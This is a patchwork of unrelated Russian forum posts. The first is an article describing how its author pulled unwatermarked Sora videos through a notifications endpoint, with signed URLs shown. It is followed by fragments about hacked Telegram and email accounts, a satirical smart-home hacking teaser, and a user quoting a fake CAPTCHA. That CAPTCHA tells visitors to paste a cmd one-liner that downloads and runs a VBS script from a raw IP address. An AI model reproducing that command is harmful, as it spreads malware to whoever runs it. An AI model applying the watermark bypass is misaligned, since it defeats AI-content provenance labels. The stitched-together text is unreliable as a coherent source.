И тут, уважаемый автор, OpenAI не облажались))) Я бы сказал, облажались вы — потому что у вас нет $20, чтобы платить за технологии. Вторая «лажа» в том, что мы живём в обществе, которое эти технологии не способно создавать, а способно только находить изъяны и кричать об этом.
(ссылка на гитхаб и на готовый продукт - в конце статьи.) OpenAI добавляет водяной знак на все видео из Sora. Типа защита. Только вот оригиналы без водяных знаков лежат на тех же серверах — и забрать их может любой авторизованный пользователь. Я написал расширение, которое это делает в один клик. Рассказываю, как нашёл и почему это вообще работает.
Я не такой частый юзер Sora, но когда увидел, что люди ПРОДАЮТ доступ к видео без водяных знаков — сначала подумал, что они сделали машинное обучение и фотошопом каждый кадр обрабатывают. Но когда я попробовал - результат был готов за 1 секунду. В тот момент я осознал: ЗНАЧИТ ВИДЕО ЛЕЖАТ НА СЕРВЕРАХ. Во мне проснулся инстинкт хакера, и я начал искать ДЫРУ.
Первым делом я полез изучать вкладку Network, пробуя различные методы тыка туда-сюда. Всё что удалось оттуда получить - это подтверждение, что да, оригинал видео без водяных знаков есть на сервере.
Например, при открытии видео мы видим запрос на получение медиафайла: /backend/project_y/post/s_69491ee99e408191addbc9b74004ebca/tree?limit=20&max_depth=1
Который и отдаёт URL для видео с водяным знаком, но в том же ответе присутствуют и другие поля:
"encodings": {
"source": {
"path": "https://videos.openai.com/az/files/00000000-3fc0-7280-a658-0386c8b0d4af/raw?se=2026-01-01T00:00:00Z&sp=r&sv=2024-08-04&sr=b&skoid=cfbc986b-d2bc-4088-8b71-4f962129715b&sktid=a48cca56-e6da-484e-a814-9c849652bcb3&skt=2025-12-27T01:09:39Z&ske=2026-01-03T01:14:39Z&sks=b&skv=2024-08-04&sig=aIewYW3/7HZGVUWwnvYnSUSplfd/WKOpvsaz0yC6wUw=&ac=oaisdsorprsouthcentralus"
},
"source_wm": {
"path": "https://videos.openai.com/az/files/00000000-3fc0-7280-a658-0386c8b0d4af/raw?se=2026-01-01T00:00:00Z&sp=r&sv=2024-08-04&sr=b&skoid=cfbc986b-d2bc-4088-8b71-4f962129715b&sktid=a48cca56-e6da-484e-a814-9c849652bcb3&skt=2025-12-27T01:09:39Z&ske=2026-01-03T01:14:39Z&sks=b&skv=2024-08-04&sig=aIewYW3/7HZGVUWwnvYnSUSplfd/WKOpvsaz0yC6wUw=&ac=oaisdsorprsouthcentralus"
},
"endcard_wm": null,
"thumbnail": {
"path": "https://videos.openai.com/az/files/ec223ed8fe79a36_00000000-3fc0-7280-a658-0386c8b0d4af/drvs/thumbnail/raw?se=2026-01-01T00:00:00Z&sp=r&sv=2024-08-04&sr=b&skoid=cfbc986b-d2bc-4088-8b71-4f962129715b&sktid=a48cca56-e6da-484e-a814-9c849652bcb3&skt=2025-12-27T01:09:39Z&ske=2026-01-03T01:14:39Z&sks=b&skv=2024-08-04&sig=eedTClrNLjxDF7aCW2CbU1TRras38CF+OgmpJ4wAW9U=&ac=oaisdsorprsouthcentralus"
},
"unfurl": {
"path": "https://videos.openai.com/az/files/34780fbcd347644_00000000-3658-7284-9d9f-64947faf826b/drvs/link_thumbnail/raw?se=2026-01-01T00:00:00Z&sp=r&sv=2024-08-04&sr=b&skoid=cfbc986b-d2bc-4088-8b71-4f962129715b&sktid=a48cca56-e6da-484e-a814-9c849652bcb3&skt=2025-12-27T01:10:43Z&ske=2026-01-03T01:15:43Z&sks=b&skv=2024-08-04&sig=3dx5D0VSb8YcK6Pf1VOuoM3s7+BaeGuUTqTnh9nAHQ4=&ac=oaisdsorprcentralus"
},
"md": {
"path": "https://videos.openai.com/az/files/2fccbbc30a166d1_00000000-3fc0-7280-a658-0386c8b0d4af/drvs/md/raw?se=2026-01-01T00:00:00Z&sp=r&sv=2024-08-04&sr=b&skoid=cfbc986b-d2bc-4088-8b71-4f962129715b&sktid=a48cca56-e6da-484e-a814-9c849652bcb3&skt=2025-12-27T01:09:39Z&ske=2026-01-03T01:14:39Z&sks=b&skv=2024-08-04&sig=KfpzXrJ15F3/iti4/NMrWGyQVbKQNmD3LCa0RuAU1Gk=&ac=oaisdsorprsouthcentralus"
},
"gif": {
"path": "https://videos.openai.com/az/files/ec3c5d130062958_00000000-3fc0-7280-a658-0386c8b0d4af/drvs/gif/raw?se=2026-01-01T00:00:00Z&sp=r&sv=2024-08-04&sr=b&skoid=cfbc986b-d2bc-4088-8b71-4f962129715b&sktid=a48cca56-e6da-484e-a814-9c849652bcb3&skt=2025-12-27T01:09:39Z&ske=2026-01-03T01:14:39Z&sks=b&skv=2024-08-04&sig=ZLmnXWBXyptAIBFFjb8oSDZmkJgMIUWH9BUspSk3kvs=&ac=oaisdsorprsouthcentralus"
}
},
Нас интересует поля source и source_wm, URL на видео без водяного знака и с водяным знаком соответственно. Проблема в том, что OpenAI в оба поля вставляют одинаковый URL. Но само наличие поля source указывает на то, что изначально оригинал там был - а значит, вероятно, до сих пор где-то есть.
Первым делом я подумал - ха, так можно просто попробовать подобрать URL, вставляя нужный gen_id/task_id/post_id. OpenAI использует целых три идентификатора для обозначения видео. Но ничего из этого не получилось, потому что в каждом URL присутствует параметр подписи (signature), который генерируется на стороне сервера и который невозможно брутфорсить.
Значит проблема где-то в другом месте...
Спустя пару часов безуспешных попыток я вдруг вспоминаю: стоп, у них же был другой сайт! Не зря этот называется Sora2 - на первом я что-то не припомню водяных знаков, а аккаунт тот же!
И вот я иду на старый сайт Sora, открываю старое видео - запрос уже другой: /backend/generations/gen_01kbk5p1s5f9pb63q81sx9atax
В нем используется gen_id вместо post_id. Я подумал - это оно! Но когда я получил gen_id для видео из новой Sora и попытался выполнить запрос с ним - получил ошибку. Хм, значит снова мимо, едем дальше.
Дальше я начал смотреть - а что еще всплывает во вкладке network?
Я при открытии сайта я увидел странный запрос: /backend/notif?limit=10
Который возвращает всю нашу библиотеку (и Sora1, и Sora2) во всех возможных качествах, включая тот самый source, который Sora2 не хотела отдавать:
"encodings": {
"source": {
"size": 5938502,
"width": 1280,
"height": 704,
"duration_secs": 10.1,
"ssim": 0.9935621,
"az_path": null,
"codec": "h264"
},
"source_c2pa": null,
"md": {...},
"ld": null,
"thumbnail": {...},
"link_thumbnail": {...},
"spritesheet": {...},
"gif": {...},
"mp3": {...},
"source_wm": {
"size": 5929815,...
},
То есть endpoint для уведомлений отдаёт то, что основной API прячет. Классика.
Открываем видео по ссылке - да, это оно. Видео, сгенерированное на новом сайте Sora2 без водяного знака!
Начали приходить такие СМС.
Вроде ничего необычного - попытка взлома.
НО. Что бы попытаться ВОЙТИ нужно бль ЗАРЕГИСТРИРОВАТЬСЯ.
Я мах не скачивал и ниразу не заходил на их сайт.
Кто нибудь сталкивался с таким?
Как связаться с поддержкой телеграмма?
Как восстановить удаленный аккаунт в тг?
(удалял сам, полмесяца назад)
Т.П. - не отвечает!
Доброго, пикабутяне. Выручайте, не пойму, где я просчитался.
Вчера ночью мне ломанули почту и с ее помощью угнали аккаунт телеграм. Ну пусть подавятся там моими фотками счетчика, дикпиками и мемами про хохлов, уже готовлюсь обрести славу и поклонников. Интересует - как? Ведь могли угнать и чёт другое и самое главное, не понятно как защититься.
Вход на почту двухфакторный. Но никаких смс не приходило! К устройствам доступ точно только у меня, никаких хвостов не оставлял (при использовании например на работе, всегда выходил и не сохранял пароли)
Ладно, допустим я где-то облажался и сам слил свои данные включая код из смс мошенникам (хотя это должно было быть пздц давно ибо последнее время точно ничего такого не делал вообще) или хапанул вирус какой. Тогда любопытно вот что:
Нас интересует событие в 4:02
В журнале нет никаких входов в аккаунт, других сеансов и отметок о прочтении того самого сообщения, пришедшего в 4:02. Но когда я в 8 часов заметил неладное и залез на почту оно уже было прочтено и сообщение о входе в самом ТГ тоже было где-то в 4:15. То есть почтой очевидно воспользовались и телегу поюзали. Прочтение других писем (уже мной) после 8 часов, как мы видим исправно отображается, как и входы на почту. Проверял, для этого даже логиниться не надо, достаточно просто зайти в ящик и отметка «вход в почту» появится. Но в районе 4 утра и ранее в ближайшие дни и даже месяцы ничего нет. Пароль менял месяц назад и сменил снова, но такое ощущение, что он мошенникам и не нужен как и смс. А значит они могут вернуться.
Какие могут быть варианты, где дыра? Как могли обойти двухфакторку и даже не оставить следов?
Хакер взломал ваш умный дом и требует биткоины, но вдруг вы делаете ему неожиданное предложение... Что будет, если цифровой гуманизм столкнется с нигерийской схемой в одном чате?
Разбор реальных угроз умных домов через призму сатиры
Как ваша веб-камера и унитаз становятся оружием в руках хакера
Неожиданный альянс между киберпреступником и жертвой ради полива помидоров
Дорогие уважаемые знатоки, подскажите пожалуйста что за шляпа. При переходе на сайт интернет магазина выводится вот такая интересная капча:
Ну как бы предлагают открыть командную строку (называя ее окном проверки), вставить туда кое что и запустить. Само кое что выглядит так:
cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.1"):h.Open "GET","http://78.40.209.164:5506/wk.vbs",0:h.Send:Execute h.ResponseText > "%temp%wk.vbs" && "%temp%wk.vbs"
Но туда же можно подсунуть что угодно, что будет выполнено на компе. Это реально капча или шляпа какая то? Какой сумрачный гений такое придумал? Ладно светофоры или мотоциклы искать, писать всякую ересь, крутить котиков, но в командную строку пихать всякое разное это как то перебор.
